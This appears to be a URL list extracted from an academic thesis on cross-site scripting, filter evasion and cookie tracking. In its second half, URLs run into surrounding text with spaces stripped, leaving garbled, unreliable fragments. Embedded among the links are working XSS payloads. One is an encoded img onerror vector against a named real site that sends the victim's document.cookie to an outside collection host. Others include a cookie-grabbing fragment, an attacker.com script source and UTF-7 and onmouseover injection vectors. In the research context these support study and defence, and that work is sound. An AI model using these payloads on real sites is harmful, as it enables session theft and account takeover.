https://www.youtube.com/watch?v=F7pYHN9iC9I

https://github.com/mattpass/ICEcoder/blob/master/lib/settings-common.php#L98

https://github.com/symphonycms/xssfilter

https://addons.mozilla.org/en-US/firefox/addon/ttpcookie/

http://www.bing.com/

http://tools.ietf.org/html/rfc2616

http://tools.ietf.org/pdf/rfc2616.pdf

https://de.search.yahoo.com/search?p=query+string

https://tools.ietf.org/html/rfc2397

https://www.ietf.org/rfc/rfc1738.txt

https://www.ietf.org/rfc/rfc1034.txt

http://a.foo.com/map/1.html

https://a.foo.com/map/2.html

http://xssplaygroundforfunandlearn.netai.net/soptest.html

http://jsfiddle.net/2w18hbsL/

http://en.wikipedia.org/wiki/Netscape_Navigator_2

http://css-tricks.com/dom/

http://fiddle.jshell.net

http://xssplaygroundforfunandlearn.netai.net

http://www.toyota.com/search/search.html

http://www.dailymail.co.uk/home/search.html

https://plus.google.com/u/0/

https://github.com/yanisadoui/keyloggerJS

http://www.symantec.com/connect/blogs/phishing-and-cross-site-scripting

https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/

http://www.zone-h.org/archive?zh=1

http://www.metasploit.com/

http://beefproject.com/

http://m.cricbuzz.com/l/info/contact

http://m.cricbuzz.com

http://www.care2.com/

http://goo.gl/mQ0I12

https://goo.gl/

http://grammar.reverso.net/

http://goo.gl/YZ2IDu

http://goo.gl/ld2xYq

http://goo.gl/R3xW5r

http://owasp-java-encoder.googlecode.com/svn/tags/1.1/core/apidocs/org/owasp/encoder/Encode.html

http://www.w3.org/TR/CSP/

https://privacyassociation.org/about/what-is-privacy

http://tools.ietf.org/html/rfc6265

http://www.bbc.com/news/

https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf

http://www.jobmail.co.za/mobile/

http://modernizr.com/

http://www.nytimes.com/

http://www.alexa.com/siteinfo/nytimes.com

https://myaccount.nytimes.com/gst/forgot.html

https://myaccount.nytimes.com/mobile/forgot/smart/index.html

http://statcounter.com/

http://www.alexa.com/siteinfo/statcounter.com

http://statcounter.com/feedback

http://m.statcounter.com/feedback/?back=/

http://noscript.net/

http://pastebin.com/AHJbjJsy

https://www.trustwave.com/modsecurity-rules-support.php

https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.0.0-dev/rules/REQUEST-41-APPLICATION-ATTACK-XSS.conf

https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/base_rules/modsecurity_crs_41_xss_attacks.conf#L11

http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html

http://pastebin.com/MabbJWWL

http://m.pinterest.com

http://i.imgur.com/sJUQdwt.jpg

http://i.imgur.com/FTVFlpm.png

http://pastebin.com/u6FY1xDA

http://en.wikipedia.org/wiki/Pinterest

http://i.imgur.com/oWwpc1e.jpg

http://www.jobmail.co.za/mobile/employerLogin.php

http://m.moneycontrol.com/mcreg.php

http://portal.motribe.mobi/signup

http://m.homes.com/index.cfm?action=myHomesLogin#signin

http://i.imgur.com/Qzp7bhJ.jpg

http://jquerymobile.com/

http://m.nlb.gov.sg/theme/default/js/validate.js

http://i.imgur.com/C0sihbg.jpg

http://pastebin.com/AxYbnufM

http://pastebin.com/BdGXfm0D

http://jsfiddle.net/Nz5ad/

http://pastebin.com/a4WSVDzf

http://ha.ckers.org/xsscalc.html

http://jsfiddle.net/dDBdP/

http://jsfiddle.net/dDBdP/1/

http://jsfiddle.net/dDBdP/2/

http://jsfiddle.net/dDBdP/3/

http://jsfiddle.net/7aUu8/

http://jsfiddle.net/GPPB6/

http://jsfiddle.net/h2XWN/1/

http://jsfiddle.net/xsrDj/

http://jsfiddle.net/F58Zd/

http://jsfiddle.net/JMEFE/

http://jsfiddle.net/5X6E6/

http://jsfiddle.net/KmQUF/

http://jsfiddle.net/Cm7JT/

http://jsfiddle.net/8JCF5/1/

https://www.owasp.org/index.php/DOM_Based_XSS

http://en.wikipedia.org/wiki/Cross-site_scripting

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

http://html5sec.org/

http://xss2.technomancie.net/vectors/

http://www.vulnerability-lab.com/resources/documents/531.txt

https://twitter.com/XSSVector

http://goo.gl/1j3Qt1

http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/

https://twitter.com/g4l4drim

http://xss2.technomancie.net/suite/47/run

http://xss2.technomancie.net/suite/48/run

http://i.imgur.com/OynTbDT.jpg

https://developers.google.com/chrome/mobile/docs/debugging

http://pages.ebay.co.uk/top-searches.html

http://www.bing.com/trends/us/top-searches

http://www.nytimes.com/most-popular-searched?period=30

https://www.facebook.com/editnote.php

https://developer.mozilla.org/en-US/docs/Web/MathML/Element/math

https://developer.mozilla.org/en-US/docs/Web/SVG/Element/svg

http://goo.gl/mMTj5m

https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules

http://www.thespanner.co.uk/2015/01/07/bypassing-the-ie-xss-filter/

http://challenge.hackvertor.co.uk/xss.php?x=%3Cmeta%20charset=utf-7%3E%2BADw-script%2BAD4-alert(1)%2BADw-%2Fscript%2BAD4-

http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg

http://www.w3.org/TR/html-markup/syntax.html#syntax-charref

http://latte.nette.org/

https://twitter.com/garethheyes

https://twitter.com/filedescriptor

http://w3techs.com/technologies/overview/programming_language/all

http://www.php.net/usage.php

http://w3techs.com/blog/entry/web_technologies_of_the_year_2013

http://trends.builtwith.com/framework/CodeIgniter

http://wiki.ecmascript.org/doku.php?id=harmony:specification_drafts

https://leanpub.com/understandinges6/read#leanpub-auto-template-strings

http://xssplaygroundforfunandlearn.netai.net/php-test-beds.html

http://dev.w3.org/html5/html-author/charref

http://jsfiddle.net/Qv6F4/

http://jsfiddle.net/Qv6F4/1/

http://www.json.org/

http://sla.ckers.org/forum/read.php?2,15812,page=10

https://mega.co.nz/#!SUIESATa!zb5Oq5HYNI-wMljJNE-AOTChFTnEgaheah4EO6Bgudc

http://www.php.net/trim

http://www.php.net/strip_tags

http://php.net/htmlentities

http://www.php.net/stripslashes

http://de3.php.net/addslashes

https://github.com/cakephp/cakephp/blob/master/lib/Cake/Utility/Sanitize.php#L139

https://github.com/thepipster/athenasites.com/blob/51950d20e7174332890d3828eb393d4b39918d6a/admin/themes/Pandora/page_templates/index.php#L13

https://github.com/Fyr/epma/blob/fcf7da41202ac89add997963cfdfc5493bb3ecc8/app/plugins/articles/views/helpers/html_article.php#L10

https://github.com/search?q=extension%3Aphp+stripImages&type=Code&ref=searchresults

http://api.cakephp.org/2.4/class-Sanitize.html

http://xssplaygroundforfunandlearn.netai.net/clean11.html

https://github.com/EllisLab/CodeIgniter/issues/2667

https://github.com/EllisLab/CodeIgniter/blob/develop/system/core/Security.php

http://xssplaygroundforfunandlearn.netai.net/clean100.html

http://blog.kotowicz.net/2012/07/codeigniter-210-xssclean-cross-site.html

https://nealpoole.com/blog/2013/07/codeigniter-21-xss-clean-filter-bypass/

https://github.com/EllisLab/CodeIgniter/issues/2667#issuecomment-33801175

https://github.com/nette/nette

http://hoola.cz/nette-xss-test/

http://www.root.cz/clanky/velky-test-php-frameworku-zend-nette-php-a-ror/

https://github.com/nette/nette/issues/1301

https://github.com/nette/nette/issues/1496

http://xssplaygroundforfunandlearn.netai.net/clean12.html

http://www.scribd.com/doc/211362856/Stored-XSS-in-Twitter-Translation

http://www.scribd.com/doc/210121412/XSS-is-not-going-anywhere

http://xssplaygroundforfunandlearn.netai.net/final.html

http://demo.chm-software.com/7fc785c6bd26b49d7a7698a7518a73ed/

https://bugcrowd.com/

http://www.w3.org/TR/html-markup/syntax.html#syntax-attr-single-quoted

http://es5.github.io/x7.html#x7.8.4

https://groups.google.com/forum/#!topic/icecoder/iogfVpbB3nc

https://bugcrowd.com/icecoder

http://www.getsymphony.com/explore/showcase/

https://www.wolfcms.org/repository

http://trends.builtwith.com/cms/Wolf-CMS

https://www.assembla.com/wiki/show/confusa

https://github.com/henrikau/confusa/commit/379d93e81d21b2e2c73c542050ecd1231c00507b

http://goo.gl/2iZB7f

http://packetstormsecurity.com/files/123927/owaspjava-bypassxss.txt

http://trends.builtwith.com/docinfo/Content-Security-Policy

https://www.blackhat.com/docs/eu-14/materials/eu-14-Javed-Revisiting-XSS-Sanitization-wp.pdf

https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement.contentEditable

https://developer.mozilla.org/en-US/docs/Web/API/document.designMode

http://html5demos.com/contenteditable

http://cheeaun.github.io/mooeditable/

http://www.scribd.com/doc/226925089/Stylish-XSS-in-Magento-When-Style-helps-you

https://www.owasp.org/index.php/HTML_Injection

https://bugzilla.mozilla.org/show_bug.cgi?id=763879

http://htmlpurifier.org/

http://www.slideshare.net/x00mario/the-innerhtml-apocalypse

http://jsfiddle.net/49a6e/

http://htmlpurifier.org/news/

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/base_rules/modsecurity_crs_41_xss_attacks.conf

http://pastebin.com/hTZRMtwy

https://twitter.com/RSnake

http://www.geo.tv/

http://www.geo.tv/images/spacer.gif

http://noscript.net/changelog

https://addons.mozilla.org/en-US/firefox/addon/noscript/

http://i.imgur.com/g32We95.jpg

http://www.example.com/PHPBB?xss=attackvector

http://www.randomstorm.com/

http://i.imgur.com/e0vJkbf.jpg

http://i.imgur.com/jtawLwc.jpg

http://i.imgur.com/2Cwb976.jpg

http://i.imgur.com/Y7MCzre.jpg

http://pastebin.com/CHWh5qcB

http://i.imgur.com/e6458JE.jpg

http://here.com/

http://xssplaygroundforfunandlearn.netai.net/victim.html

http://email.about.com/od/windowslivehotmailtips/qt/Know_When_Your_Windows_Live_Hotmail_Account_Becomes_Inactive.htm

https://www.facebook.com/notes/facebook-security/introducing-trusted-contacts/10151362774980766

https://developers.facebook.com/tools/explorer

https://developers.facebook.com/tools/explorer?method=GET&path=FBID?fields=id,name

https://www.facebook.com/guardian/confirm.php?guardians0=FBID0&guardians1=FBID1&guardians2=FBID2&cuid=AYi[...]XrNQaw&email=attackersuppliedemailaddressgoeshere

https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

https://www.facebook.com/first_name.last_name.50596

http://privacychoice.org/

https://addons.mozilla.org/en-us/firefox/addon/ttpcookie/

http://www.alexa.com/

http://i.imgur.com/YDYJl7O.png

http://www.chm-software.com/ttpCookie/?p=overview

http://fourthparty.info/

http://i.imgur.com/llvVTa7.jpg

http://i.imgur.com/8vXi00y.jpg

http://randomwalker.info/publications/cookie-surveillance-v2.pdf

https://www.torproject.org/

http://www.alexa.com/topsites

http://m.intel.com/content/intel-us/en.touch.html

http://m.maps.nokia.com/#action=search&params=%7B%7D&bmk=1

http://mobile.nytimes.com/search

http://m.mtv.com/asearch/index.rbml?search=

http://m.howstuffworks.com/s/4759/Feedback

http://m.slashdot.org/

http://m.pinterest.com/

http://m.dictionary.com/

http://m.mapquest.com/

http://blog.ircmaxell.com/2014/12/php-install-statistics.html

https://www.youtube.com/watch?v=oAYjZy1Nuyg

http://www.google.com/trends/explore#q=XSS%2C%20SQL%20Injection&date=today%2012-m&cmpt=q

http://www.bccriskadvisory.com/wp-content/uploads/Edgescan-Stats-Report.pdf

https://www.brighttalk.com/webcast/288/97255

http://www.osvdb.org/osvdb/show_graph/1

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

http://www.cvedetails.com/vulnerabilities-by-types.php

https://twitter.com/TweetDeck/status/476770732987252736

https://storify.com/pacohope/from-i-wonder-to-exploitable-worm

http://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html

http://newsroom.fb.com/company-info/

http://doi.acm.org/10.1145/1242572.1242661

http://www.csid.com/wp-content/uploads/2012/09/CS_PasswordSurvey_FullReport_FINAL.pdf

http://passwordresearch.com/stats/statistic221.html

http://news.bbc.co.uk/2/hi/uk_news/720976.stm

https://blog.kissmetrics.com/facebook-statistics/

http://dx.doi.org/10.1109/SP.2012.47

http://doi.acm.org/10.1145/2508859.2512521

http://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf

http://krebsonsecurity.com/2013/06/the-value-of-a-hacked-email-account/

http://www.slate.com/blogs/future_tense/2013/12/13/nsa_surveillance_and_third_party_trackers_how_cookies_help_government_spies.html

http://papers.ssrn.com/sol3/papers.cfm?abstract_id=1478214

http://izquotes.com/quote/296683

http://goo.gl/PdUuL7

http://www.martinjohns.com/

https://code.google.com/p/browsersec/wiki/Main

http://venom630.free.fr/pdf/The%20Tagled%20Web%20A%20Guide%20to%20Securing%20Modern%20Web%20Applications.pdf

https://url.spec.whatwg.org/

http://www.ietf.org/rfc/rfc3986.txt

http://domenlightenment.com/#1.1

https://docs.webplatform.org/wiki/tutorials/content-security-policy

http://blogs.msdn.com/b/ieinternals/archive/2009/08/28/explaining-same-origin-policy-part-1-deny-read.aspx

https://books.google.de/books?id=eGeLZwEACAAJ&dq=single+sign+on&hl=en&sa=X&ei=ThiyVO-ZCIeBPZ6JgLgJ&redir_esc=y

https://www.joelweinberger.us/papers/2012/weinberger-thesis.pdf

http://www.webappsec.org/projects/articles/071105.shtml

http://doi.acm.org/10.1145/2508859.2516723

http://doi.acm.org/10.1145/2508859.2516703

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

http://dx.doi.org/10.1007/978-3-319-05149-9_7

http://en.wikipedia.org/wiki/Sarah_Palin_email_hack

https://www.facebook.com/notes/facebook-security/national-cybersecurity-awareness-month-updates/10150335022240766

https://www.eff.org/deeplinks/2014/07/dear-nsa-privacy-fundamental-right-not-reasonable-suspicion

http://biblion.epfl.ch/EPFL/theses/2011/4928/EPFL_TH4928.pdf

http://www.chromium.org/Home/chromium-security/client-identification-mechanisms

http://dl.acm.org/citation.cfm?id=2228298.2228315

http://www.isoc.org/isoc/conferences/ndss/10/pdf/05.pdf

http://www.brainyquote.com/quotes/quotes/h/howardrhei560017.html

http://dl.acm.org/citation.cfm?id=2028067.2028068

https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project

http://httpd.apache.org/docs/2.2/mod/mod_proxy.html

http://www.slideshare.net/LukasKlein1/attacking-and-defending-html5-postmessage-in-mobile-websites

https://docs.google.com/spreadsheets/d/1F6vtyi10sHZjRe48FkE210VZCfLpZ60oS-JYvaAO1b0/edit#gid=1395390430

http://doi.acm.org/10.1145/1368088.1368112

http://www.knowyourelements.com/#tab=list-view&date=2013-01-24

http://www.webappers.com/2013/03/15/a-complete-guide-of-jquery-mobile-for-beginners/

http://blogs.msdn.com/b/ieinternals/archive/2011/01/31/controlling-the-internet-explorer-xss-filter-with-the-x-xss-protection-http-header.aspx

http://doi.acm.org/10.1145/1772690.1772701

http://msdn.microsoft.com/en-us/library/az24scfc.aspx

http://www.regular-expressions.info/tutorialcnt.html

http://www.cheatography.com/davechild/cheat-sheets/regular-expressions/

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions

http://doi.acm.org/10.1145/1516046.1516066

http://en.wikipedia.org/wiki/ReDoS

http://www.computerbytesman.com/redos/retime_js.source.txt

http://ejohn.org/blog/accuracy-of-javascript-time/

http://doi.acm.org/10.1145/1141277.1141357

https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XUL

https://groups.google.com/forum/#!topic/mozilla.dev.platforms.mobile/_42Jv6KDg7s

https://noscript.net/nsa/

http://doi.acm.org/10.1145/2382196.2382276

http://nette.org/

http://blog.ivanristic.com/2010/09/introducing-canoe-context-aware-output-encoding-for-xss-prevention.html

https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Main

http://doi.acm.org/10.1145/2429069.2429115

http://doi.acm.org/10.1145/2046707.2046776

http://tldp.org/HOWTO/Secure-Programs-HOWTO/cross-site-malicious-content.html

http://resources.sei.cmu.edu/asset_files/WhitePaper/2001_019_001_52452.pdf

http://www.acunetix.com/blog/web-security-zone/preventing-xss-attacks/

http://forums.alfresco.com/forum/developer-discussions/development-environment/are-following-characters-xss-vulnerable-03302012

http://incompleteness.me/blog/2008/12/04/xss-filtering/

http://forums.asp.net/t/1792144.aspx?Potentially+Dangerous+Characters

https://www.owasp.org/index.php/Talk:Testing_for_Cross_site_scripting

http://www.php.net/

http://dl.acm.org/citation.cfm?id=2041225.2041237

http://dev.w3.org/html5/html-author/

http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx

http://www.w3.org/TR/html-markup/syntax.html#syntax-attributes

http://goo.gl/HDH38F

http://doi.acm.org/10.1145/1772690.1772784

http://msdn.microsoft.com/en-us/library/ms537634%28v=vs.85%29.aspx

https://github.com/JianH/phpXXS/blob/f6b7bf73f36715d35a2e27e459d8096ebe0832f1/func.php#L5

http://pear.php.net/

http://www.alexa.com/topsites/category

http://icecoder.net/

http://www.getsymphony.com/

https://www.wolfcms.org/

http://doi.acm.org/10.1145/1242572.1242654

http://doi.acm.org/10.1145/1455770.1455783

http://www.isoc.org/isoc/conferences/ndss/09/pdf/01.pdf

http://doi.acm.org/10.1145/948109.948146

http://terri.zone12.com/doc/academic/TerriOda-PhDThesis-WebSecurity.pdf

http://dx.doi.org/10.1007/11863908_27

http://doi.acm.org/10.1145/2508859.2516708

http://doi.acm.org/10.1145/2046707.2093483

http://htmlpurifier.org/comparison

http://blog.astrumfutura.com/2010/08/html-sanitisation-the-devils-in-the-details-and-the-vulnerabilities/

http://dx.doi.org/10.1109/SP.2008.22

http://www.brainyquote.com/quotes/quotes/k/kenfollett387962.html

http://www.jivesoftware.com/why-jive/customers/#view=list

http://www.tinymce.com/enterprise/using.php

http://www.lithium.com/why-lithium/customer-success/

https://github.com/stefanneculai/froala-wysiwyg/issues/33#issuecomment-41170451

http://ephox.com/customers

http://ckeditor.com/about/who-is-using-ckeditor

http://daringfireball.net/projects/markdown/

http://operawiki.info/TextAreaEditor

http://ckeditor.com/blog/Top-WYSIWYG-Editor-Myths

http://doi.acm.org/10.1145/2046707.2046735

http://www.tinymce.com/develop/bugtracker.php

http://editor.froala.com/

http://www.html5rocks.com/en/tutorials/security/sandboxed-iframes/

http://www.brainyquote.com/quotes/quotes/a/abrahamlin161741.html

http://dx.doi.org/10.1007/978-3-319-13257-0_33

http://www.w3.org/Security/wiki/Same_Origin_Policy

http://dx.doi.org/10.1109/ICDCS.2010.71

https://www.whitehatsec.com/resource/whitepapers/XSS_cross_site_scripting.html

https://www.zone-h.org/archive/special=1

http://www.modsecurity.org/documentation/modsecurity-apache/2.1.3/html-multipage/ar01s02.html

http://terri.zone12.com/doc/academic/TR-11-04-Oda.pdf

http://www.webkit.org/

http://www.chromium.org/

https://dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html

https://blog.whitehatsec.com/hackerkast-29-bonus-round-formaction-scriptless-attack/

http://klevjers.com/papers/phishing.pdf

http://www.whatwg.org/specs/web-apps/current-work/multipage/

http://www.ecmascript.org/

https://src.chromium.org/viewvc/blink?view=revision&revision=150541

https://bugzilla.mozilla.org/show_bug.cgi?id=855326

http://yuiblog.com/sandbox/yui/3.3.0pr3/api/Escape.html

http://wonko.com/post/html-escaping

https://www.phpbb.com/

http://www.phplist.com/

http://www.dvwa.co.uk/

https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/#.UfYjL403Blh

http://sqlulz.blogspot.de/2013/05/anti-csrf-token-stealing-via-xss-and.html

http://www.w3.org/html/wg/drafts/html/master/forms.html#attr-fs-formaction

http://www.w3.org/TR/REC-html40/interact/scripts.html

http://dl.acm.org/citation.cfm?id=2028040.2028048

http://dx.doi.org/10.1007/978-3-319-11379-1_11

https://twitter.com/freddyb/status/304878658345107456

http://kangax.github.io/es5-compat-table/#Object.defineProperty

http://kangax.github.io/es5-compat-table/#Object.freeze

http://kangax.github.io/es5-compat-table/#Object.preventExtensions

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/defineProperty

http://msdn.microsoft.com/en-us/library/ie/ff806186(v=vs.94).aspx

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/preventExtensions

http://googleonlinesecurity.blogspot.de/2007/07/automating-web-application-security.html

http://tuvianblog.com/2011/07/14/how-to-access-url-or-url-parts-using-javascript-get-the-website-url-using-javascript/

https://bugzilla.mozilla.org/show_bug.cgi?id=886164

http://www.harampanti.com/2014/04/funny-one-liner-please-stop-asking-me_22.html

http://dx.doi.org/10.1109/ICDCSW.2014.30

http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html

http://dl.acm.org/citation.cfm?id=2026647.2026653

http://doi.acm.org/10.1145/1526709.1526784

https://www.facebook.com/SophosSecurity

http://sophosnews.files.wordpress.com/2011/10/facebook-security-infographic.pdf

http://blogs.mcafee.com/consumer/fake-friends

http://blog.stephenwolfram.com/2013/04/data-science-of-the-facebook-world/

http://www.wired.com/gadgetlab/2012/08/apple-amazon-mat-honan-hacking/all/

http://www.brainyquote.com/quotes/quotes/m/marlonbran154603.html?src=t_privacy

http://www.chm-software.com/ttpCookie/

http://dx.doi.org/10.1007/978-3-642-30436-1_20

http://blog.silktide.com/2012/09/the-cookie-law-is-dead-youre-welcome/

http://www.theinquirer.net/inquirer/news/2203576/software-firm-challenges-ico-on-cookie-law

http://www.bbc.co.uk/news/technology-19505835

http://doi.acm.org/10.1145/1177080.1177088

http://icapeople.epfl.ch/freudiger/privacookie/privacookie.html

http://privacychoice.org/checkprivacyscores

http://privacyscore.com/

http://doi.acm.org/10.1145/2660267.2660347

https://addons.mozilla.org/de/firefox/addon/betterprivacy/

http://cyberlaw.stanford.edu/node/6694

http://dl.acm.org/citation.cfm?id=1972457.1972475

http://www.mozilla.org/en-US/collusion/

https://addons.mozilla.org/en-us/firefox/addon/extended-cookie-manager/

https://addons.mozilla.org/en-us/firefox/addon/beef-taco-targeted-advertising/

http://doi.acm.org/10.1145/1180405.1180426

http://www.nds.rub.de

http://www.zone-h.org/15

http://www.sohu.com/[11].In2013,XSSissuewasusedbytheattackersforthehackingofAppleDeveloper3andUbuntuForums4.1.2AccountRecoveryOneoftheimportantaspectofwebapplicationisanaccountrecoveryfeature.Passwords|almostuniversalwayforrecoveringaccesstowebapplicationsac-counts.Intoday'sweb,noonedisputestheimportantroleofsocialnetworkingsitese.g.,Facebookhad864milliondailyactiveusersonaverageinSeptember2014[12].1.2.1FactsandFigures

http://mytechblog.com/other/apple/apple-developer-website-hacked-what-happened/4http://blog.canonical.com/2013/07/30/ubuntu-forums-are-back-up-and-a-post-mortem/16

http://www.adweek.com/socialtimes/ads-ap-apply/2663646http://donottrack.us/7http://www.w3.org/TR/CSP2/8https://www.mozilla.org/en-US/9Wesurveyed10topsitesfrom10di

https://www.youtube.com/watch?v=F7pYHN9iC9I11https://github.com/mattpass/ICEcoder/blob/master/lib/settings-common.php#L9812https://github.com/symphonycms/xssfilter18

https://addons.mozilla.org/en-US/firefox/addon/ttpcookie/19

http://www.bing.com

http://tools.ietf.org/html/rfc261622

http://tools.ietf.org/pdf/rfc2616.pdf23

http://www.ietf.org/rfc/rfc1738.txt//httpsschemehttp://www.bbc.com/news//httpschemejavascript:doSomethingUseful

http://gmail.com//mailtoschemetel:+4917681106991//telscheme

https://tools.ietf.org/html/rfc23975https://www.ietf.org/rfc/rfc1738.txt6Thefullyquali

http://a.foo.com/map/1.htmlcannotaccesstheDOMofhttps://a.foo.com/map/2.htmlbecauseofdi

http://xssplaygroundforfunandlearn.netai.net/soptest.htmlandcon-tainsanarbitrarysecrettokenasapartofitsDOMtree.Thesecondpageisavailableathttp://jsfiddle.net/2w18hbsL/triestoaccessthatsecretto-kenwiththehelpofaJavaScript.TheFigure.2.2showstheDOMtreeofthepageavailableathttp://xssplaygroundforfunandlearn.netai.net/7http://en.wikipedia.org/wiki/Netscape_Navigator_28http://css-tricks.com/dom/26

http://window.open

http://www.toyota.com/search/search.htmlresultsinthefollowingHTMLcontextoutput./*Inputreflectsbackasabodyof

http://www.toyota.com/search/search.htmlresultsinthefollowingattributecon-textoutput./*Inputreflectsasavalueof

http://www.dailymail.co.uk/home/search.htmlresultsinthefollowingscriptcon-textoutput.

https://github.com/yanisadoui/keyloggerJS10http://www.symantec.com/connect/blogs/phishing-and-cross-site-scripting11https://blog.whitehatsec.com/interview-with-a-blackhat-part-1/12http://www.zone-h.org/archive?zh=113http://www.metasploit.com/14http://beefproject.com/32

http://m.cricbuzz.com/l/info/contact,sitepro-videsacontactformincaseofaninquiry.Acontactformhasthefollowing

http://xssplaygroundforfunandlearn.netai.net/xssdemoPOST.php?c='+document.cookie>

http://xssplaygroundforfunandlearn.netai.net/xssdemoPOST.html.

http://xssplaygroundforfunandlearn.netai.net/xssdemoPOST.php?c=SID=1234

http://www.care2.com/andwefoundGETparameter

http://www.care2.com/find/site#q=%22%3E%3Cimg+src%3Dx+onerror%3D%27document.location%3D%22//xssplaygroundforfunandlearn.netai.net/xssdemoPOST.php%3Fc%3D%22%2Bdocument.cookie%27%3ETheattackercanalsouseURLshortnerservices

http://goo.gl/mQ0I12willalsoachievesthesameresult

https://goo.gl/34

http://grammar.reverso.net/employsregularexpressionthatdoesthejobofremovingdangerouschar-acters.functionRecherche

http://goo.gl/YZ2IDu18https://github.com/Cliprz/Cliprz19http://goo.gl/ld2xYq20http://goo.gl/R3xW5r35

http://owasp-java-encoder.googlecode.com/svn/tags/1.1/core/apidocs/org/owasp/encoder/Encode.html36

http://www.w3.org/TR/CSP2/23http://www.w3.org/TR/CSP/37

http://stats.analytics.com

http://.facebook.com

http://.cdn.trusted.com

https://privacyassociation.org/about/what-is-privacy25http://tools.ietf.org/html/rfc626540

http://www.bbc.com/news/,athird-partytracker

http://www.bbc.com/news/toprovidetar-getedadvertisingcanlogtheuser'svisittohttp://www.bbc.com/news/.Thetrackercannowlinktheuser'svisittohttp://www.bbc.com/news/withtheuser'svisittoothersitesonwhich

https://www.whitehatsec.com/assets/WPstatsReport_052013.pdf43

http://statcounter.com/9http://www.alexa.com/siteinfo/statcounter.com10http://statcounter.com/feedback11http://m.statcounter.com/feedback/?back=/46

http://s.work

http://noscript.net/48

http://pastebin.com/AHJbjJsy.

https://www.trustwave.com/modsecurity-rules-support.php14https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/v3.0.0-dev/rules/REQUEST-41-APPLICATION-ATTACK-XSS.conf15https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/base_rules/modsecurity_crs_41_xss_attacks.conf#L1116ThetestingwasdoneatthetimeofwritingofrelatedresearchpaperpublicationinWISA2013[41].17http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html18Thecompletelistofsurveyedmobilesitesisavailableathttp://pastebin.com/MabbJWWL49

http://pastebin.com/u6FY1xDA20http://en.wikipedia.org/wiki/Pinterest21XSSisnow

http://i.imgur.com/oWwpc1e.jpg22http://www.jobmail.co.za/mobile/employerLogin.php23http://m.moneycontrol.com/mcreg.php24http://portal.motribe.mobi/signup25http://m.homes.com/index.cfm?action=myHomesLogin#signin50

http://0x.lv

http://jquerymobile.com/28http://m.nlb.gov.sg/theme/default/js/validate.js29Theurl0x.lvhasbeendevelopedbyEduardoVelaofGoogle.51

http://andnotonindividualXSSvectors.OurstartingpointwastheworkofWassermanet.al

http://i.imgur.com/C0sihbg.jpgshowsthatthelargenumberofXSSvectorsbelongtothreemaincategories

http://pastebin.com/AxYbnufM52

http://proposedbyAdamBarthetal.in

http://www.attacker.com/foo.js

http://pastebin.com/BdGXfm0D.32http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html33http://jsfiddle.net/Nz5ad/53

http://pastebin.com/a4WSVDzfinfavorofspacerestrictions.InordertoconvertXSSvectorsintoobfuscatedform,attackercanusepubliclyavailableutilitieslikehttp://ha.ckers.org/xsscalc.html.

http://jsfiddle.net/dDBdP/35http://jsfiddle.net/dDBdP/1/36http://jsfiddle.net/dDBdP/2/37http://jsfiddle.net/dDBdP/3/38http://jsfiddle.net/7aUu8/39http://jsfiddle.net/GPPB6/40http://jsfiddle.net/h2XWN/1/41http://jsfiddle.net/xsrDj/42http://jsfiddle.net/F58Zd/54

http://www.google.com/logos/classicplus.png

http://jsfiddle.net/JMEFE/44http://jsfiddle.net/5X6E6/45http://jsfiddle.net/KmQUF/46http://jsfiddle.net/Cm7JT/55

http://jsfiddle.net/8JCF5/1/.Wassermannetal.'sregularexpressionis:

https://www.owasp.org/index.php/DOM_Based_XSS48http://en.wikipedia.org/wiki/Cross-site_scripting58

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet2.HTML5SecurityCheatsheetavailableathttp://html5sec.org/3.523XSSvectorsavailableathttp://xss2.technomancie.net/vectors/4.Technicalattacksheetforcrosssitepenetrationtestsathttp://www.vulnerability-lab.com/resources/documents/531.txt.5.@XSSVectorTwitterAccounthttps://twitter.com/XSSVector.Ithas130pluslatestXSSvectors.Second,thecreator51ofoneoftheaboveresourceshasdevelopedanautomatedtestingframework52forusinordertotestthe

http://goo.gl/1j3Qt150http://www.thespanner.co.uk/2014/10/24/unbreakable-filter/51Galadrimhttps://twitter.com/g4l4drim52http://xss2.technomancie.net/suite/47/runandhttp://xss2.technomancie.net/suite/48/run59

http://i.imgur.com/OynTbDT.jpgshowsourXSS

https://developers.google.com/chrome/mobile/docs/debugging60

http://pages.ebay.co.uk/top-searches.html55http://www.bing.com/trends/us/top-searches61

http://www.nytimes.com/most-popular-searched?period=3057https://www.facebook.com/editnote.php62

https://developer.mozilla.org/en-US/docs/Web/MathML/Element/math59https://developer.mozilla.org/en-US/docs/Web/SVG/Element/svg63

http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd

http://www.w3.org/2000/svg

https://www.google.com/'

